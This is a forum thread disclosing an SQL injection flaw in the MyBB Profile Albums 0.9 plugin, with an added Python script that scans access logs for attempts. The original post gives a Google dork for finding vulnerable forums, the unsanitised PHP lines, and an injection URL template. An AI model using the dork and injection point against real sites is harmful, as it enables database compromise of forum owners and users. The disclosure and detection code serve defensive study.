MyBB Profile Albums 0.9 SQL Injection
#1
# Exploit Title: Profile Albums MyBB plugin SQL Injection 0day
# Google Dork: inurl:albums.php intext:"powered by Mybb"
# Date: 14.10.2012
# Exploit Author: Th3FreakPony
# Software Link: http://mods.mybb.com/view/profilealbums
# Version: 0.9
# Tested on: Linux.
----------------------------------------------

The vulnerability exists within albums.php:

PHP Code:
<?
/*Line 69*/ $aid = $mybb->input['album'];
/*Line 86*/ $query_add_breadcrumb = $db->simple_select("albums", "*", "aid='".$aid."'");
?>

/albums.php?action=editimage&image=[Valid_ID]&album=[Valid_album_ID][SQLi]

(You need to create a new account && upload album and images)
----------------------------------------------
Liked by: Symxq
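
A defensive check for the flaw described in the post above, as an added example that is not part of the original post: it scans web-server access logs for `albums.php` requests whose `album` parameter is not a plain integer, which is the value that reaches `simple_select` unfiltered on the quoted lines 69 and 86. The log lines are constructed, and treating album IDs as plain decimal integers is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines in Apache combined format (not from the original post).
SAMPLE_LOG = """\
203.0.113.5 - - [14/Oct/2012:10:01:02 +0000] "GET /albums.php?action=editimage&image=4&album=7 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [14/Oct/2012:10:03:40 +0000] "GET /albums.php?action=editimage&image=4&album=7%27 HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.9 - - [14/Oct/2012:10:03:55 +0000] "GET /forum/albums.php?album=7abc&action=editimage&image=4 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.2 - - [14/Oct/2012:10:05:00 +0000] "GET /showthread.php?tid=12 HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
198.51.100.7 - - [14/Oct/2012:10:06:10 +0000] "GET /albums.php HTTP/1.1" 200 700 "-" "Mozilla/5.0"
"""

# client IP, timestamp and request target of one combined-format log line
REQUEST_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:[A-Z]+) (\S+) HTTP/[0-9.]+"'
)


def suspicious_album_requests(log_text):
    """Return (client_ip, timestamp, decoded album value) for every
    albums.php request whose album parameter is not plain ASCII digits."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue  # not a request line in the expected format
        client_ip, timestamp, target = match.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith("/albums.php"):
            continue
        # parse_qs percent-decodes values, so %27 is compared as a quote
        params = parse_qs(url.query)
        for value in params.get("album", []):
            # isdigit() alone accepts non-ASCII digits, hence isascii()
            if not (value.isascii() and value.isdigit()):
                hits.append((client_ip, timestamp, value))
    return hits


if __name__ == "__main__":
    for client_ip, timestamp, value in suspicious_album_requests(SAMPLE_LOG):
        print(f"{timestamp} {client_ip} album={value!r}")
```

Only query strings are visible in access logs, so a value sent in a request body is not covered by this check.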
#2
Thanks for your work, exciting
People don't change; the only things that change are circumstances and interests...
#3
Thanks